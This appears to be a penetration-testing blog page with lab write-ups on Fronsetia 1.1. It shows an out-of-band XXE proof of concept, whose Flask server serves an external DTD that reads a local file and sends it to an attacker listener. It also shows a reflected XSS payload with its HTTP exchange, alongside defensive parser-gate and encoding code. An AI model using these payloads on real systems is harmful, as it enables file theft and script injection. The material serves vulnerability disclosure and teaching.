Thursday, 21 November 2024

Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description

- The show_operations.jsp page fetches the WSDL URL supplied in the Fronsetia_WSDL parameter and parses it with DTD processing enabled, so an attacker-hosted document can pull in an external DTD that reads a local file and sends its contents to an attacker-controlled server (out-of-band XXE injection)


XXE #1 - "show_operations.jsp"

Steps to Reproduce:

  1. On the attacker host (192.168.78.1) start the Python server below. It listens on port 10000 and serves both the fake WSDL (/testxxeService) and the external DTD (/data.dtd) that the target's XML parser will fetch.
  2. On the target, create the file the DTD reads: echo 123123 > /tmp/123 (the DTD references file:///tmp/123, so the file name matters). A single token is used on purpose: the contents end up inside a URL, and a file containing newlines or other characters not allowed in a URL would make the generated entity's SYSTEM identifier invalid, so the exfiltration request would never be sent.
  3. On the attacker host start a listener on port 8000 to catch the exfiltrated data, e.g. python3 -m http.server 8000
  4. Enter the following URL as input; the Fronsetia_WSDL parameter makes the application fetch and parse the attacker-controlled document
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl
  5. The file contents arrive at the port 8000 listener as a request for /?content=123123

// Python Server Code (runs on the attacker host 192.168.78.1; serves the fake WSDL on /testxxeService and the external DTD on /data.dtd)

from flask import Flask, Response
import logging

app = Flask(__name__)

# Set up logging so every fetch made by the target's XML parser is visible
logging.basicConfig(level=logging.DEBUG)

ATTACKER = "192.168.78.1"


@app.route('/testxxeService')
def serve_wsdl():
    # Stage 1: the "WSDL" the application fetches. Its DOCTYPE pulls in an
    # external DTD from this server; the exfiltration happens while that DTD
    # is processed, so the undefined &send; reference in the body never matters.
    app.logger.debug("Serving XXE payload")
    xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://{ATTACKER}:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)


@app.route('/data.dtd')
def serve_dtd():
    # Stage 2: the external DTD. %file; reads the target file; %eval; declares
    # a further parameter entity whose SYSTEM id embeds the file contents in a
    # URL (&#37; is '%': a literal '%' inside an entity value would be read as
    # a parameter entity reference); %exfil; then makes the parser request that
    # URL from the listener on port 8000.
    app.logger.debug("DTD requested")
    dtd = f"""<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM 'http://{ATTACKER}:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(dtd, mimetype='text/xml', status=200)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
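Fronsetia is a Java application and the post does not say which XML parser it uses, so the fix is not shown here; in a JAXP/Xerces parser it is the disallow-doctype-decl feature (http://apache.org/xml/features/disallow-doctype-decl), which rejects the document at the DOCTYPE before any entity is fetched. The following is an added example, not code from the post or from Fronsetia: a Python pre-parse gate implementing the same policy with the standard library's expat, which is told never to process external parameter entities and is given no external-entity handler, so inspecting a document cannot itself trigger a file read or a network fetch. It is run against the post's own OOB payload, against a constructed in-band variant (going beyond the post's case), and against a constructed clean WSDL; the three sample documents and all function names are this example's own.

```python
import xml.parsers.expat as expat

# Constructed sample: the document the attacker's server hands to the
# application when it fetches the "WSDL" (the post's OOB payload, verbatim).
OOB_XXE_WSDL = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""

# Constructed sample: the in-band variant (file read straight into the
# response), which the same gate must also catch.
INBAND_XXE_WSDL = b"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<definitions>&xxe;</definitions>"""

# Constructed sample: a harmless WSDL skeleton with no DOCTYPE at all.
CLEAN_WSDL = b"""<?xml version="1.0"?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/" name="svc">
  <service name="svc"/>
</definitions>"""


def dtd_findings(xml_bytes):
    """Report the DTD constructs in a document without resolving anything.

    expat is told never to process external parameter entities, and no
    ExternalEntityRefHandler is installed, so neither %dtd; nor &xxe; can
    cause a file or network access while we look. Declarations are still
    delivered to the handlers below, which is all the gate needs.
    """
    findings = {"doctype": None, "entities": []}
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def start_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = {"name": name, "system_id": system_id,
                               "internal_subset": bool(has_internal_subset)}

    def entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # value is None and system_id is set for external (SYSTEM/PUBLIC) entities
        findings["entities"].append({"name": name,
                                     "parameter": bool(is_parameter),
                                     "external": system_id is not None,
                                     "system_id": system_id})

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as err:
        # Malformed input is rejected anyway; keep what was seen before the error.
        findings["parse_error"] = str(err)
    return findings


def is_safe_wsdl(xml_bytes):
    """Gate policy, same as disallow-doctype-decl: any DOCTYPE means reject.

    A WSDL has no business carrying a DTD, and refusing the whole DOCTYPE is
    simpler and safer than trying to allow 'harmless' entities.
    """
    findings = dtd_findings(xml_bytes)
    return findings["doctype"] is None and "parse_error" not in findings


def external_entity_urls(xml_bytes):
    """SYSTEM identifiers an unguarded parser would have fetched; useful for alerting."""
    return [e["system_id"] for e in dtd_findings(xml_bytes)["entities"] if e["external"]]
```

The gate sits in front of whatever parser consumes the fetched WSDL; the findings (DOCTYPE name, entity names, SYSTEM identifiers) are what you would log, since the external URL in a rejected document points straight at the attacker's infrastructure.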

Wednesday, 20 November 2024

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

Description

- The Fronsetia_WSDL parameter of show_operations.jsp is reflected into the response without HTML encoding, so the application is vulnerable to reflected XSS


Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Visit the main page of the application.
  2. In the "WSDL Location" input field enter the following payload and submit the form: "><img src=x onerror=alert(1)>
  3. The value is reflected into show_operations.jsp unencoded (request and response below) and the onerror handler runs. The leading "> is there to close a quoted attribute value and its tag where the parameter is reflected inside one; a reflection inside <title> on its own would not execute, since the browser treats <title> content as text (RCDATA) and a tag injected there only takes effect after a closing </title>.

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1
Host: 192.168.78.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
[...]


// HTTP Response

HTTP/1.1 200 
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6360
Date: Wed, 20 Nov 2024 19:42:15 GMT
Keep-Alive: timeout=20
Connection: keep-alive

[...]
<title> Fronsetia: "><img src=x onerror=alert(1)> </title>
[...]
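The practical question when a parameter comes back in the page is where it lands, because the breakout depends on the context: the post's "> prefix closes a quoted attribute, inside <title> a </title> is needed first, and in plain HTML text the <img> works as-is. The following is an added example, not code from the post or from Fronsetia: a Python reflection-context triage routine plus the encoding fix for the <title> line. The sample response is constructed for the example (the post truncates the real one): it reflects the probe inside <title>, as the post shows, and, as this example's own assumption, inside the value attribute of the WSDL input field. The probe string and all names are the example's.

```python
import html
import re

# Constructed sample response (not the real Fronsetia page): the probe is
# reflected once inside <title>, as in the post, and once, assumed here for
# the example, inside a double-quoted value attribute.
PROBE = "zx9qPROBEq9xz"
SAMPLE_RESPONSE = (
    f"<html><head><title> Fronsetia: {PROBE} </title></head>\n"
    f'<body><form><input type="text" name="Fronsetia_WSDL" value="{PROBE}"></form>'
    "</body></html>"
)

# Elements whose content the browser treats as text, not markup: a tag injected
# inside them does nothing until the element is closed.
TEXT_ONLY_ELEMENTS = ("title", "textarea", "script", "style")


def reflection_contexts(body, probe):
    """Locate every reflection of probe and classify the HTML context it lands in."""
    contexts = []
    for m in re.finditer(re.escape(probe), body):
        before = body[: m.start()]
        if before.rfind("<") > before.rfind(">"):
            # Inside a tag. An odd number of quotes since the tag opened means
            # the reflection is inside a quoted attribute value.
            tag = before[before.rfind("<"):]
            quote = '"' if tag.count('"') % 2 else ("'" if tag.count("'") % 2 else "")
            contexts.append({"offset": m.start(), "context": "attribute", "quote": quote})
            continue
        context = "text"
        for name in TEXT_ONLY_ELEMENTS:
            opens = [t.end() for t in re.finditer(rf"<{name}\b[^>]*>", before, re.I)]
            closes = [t.end() for t in re.finditer(rf"</{name}\s*>", before, re.I)]
            if opens and (not closes or closes[-1] < opens[-1]):
                context = name  # reflection sits inside an unclosed text-only element
                break
        contexts.append({"offset": m.start(), "context": context, "quote": ""})
    return contexts


def payload_for(ctx, js="alert(1)"):
    """Minimal breakout payload for a context found by reflection_contexts."""
    img = f"<img src=x onerror={js}>"
    if ctx["context"] == "attribute":
        return f"{ctx['quote']}>{img}"       # close the value, then the tag
    if ctx["context"] in TEXT_ONLY_ELEMENTS:
        return f"</{ctx['context']}>{img}"   # end the text-only element first
    return img                               # plain HTML text: the tag works as-is


def render_title(wsdl, encode=True):
    """The <title> line of show_operations.jsp, with (encode=True) and without the fix."""
    shown = html.escape(wsdl, quote=True) if encode else wsdl
    return f"<title> Fronsetia: {shown} </title>"
```

The context classifier is a heuristic for a first pass over a response (it is not a real HTML tokenizer), so confirm the chosen breakout in a browser. The fix is the last function: HTML-encoding the value for the context it is written into, which turns the post's payload into `&quot;&gt;&lt;img ...&gt;` and leaves nothing for the browser to parse as markup.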

Thursday, 7 November 2024

It's Official - BSCP Certified

It's official. I'm BSCP (Burp Suite Certified Practitioner) certified. It took me a few tries to pass :)


Key takeaways from the attempts:

  • Don't give up
  • It's a difficult exam
  • Check all the relevant labs in the PortSwigger Academy
  • Check for bypasses in the Academy labs
  • Make sure to have a good list of notes such as payloads and bypasses ready

That's it, folks!

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

Description - It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place. Stor...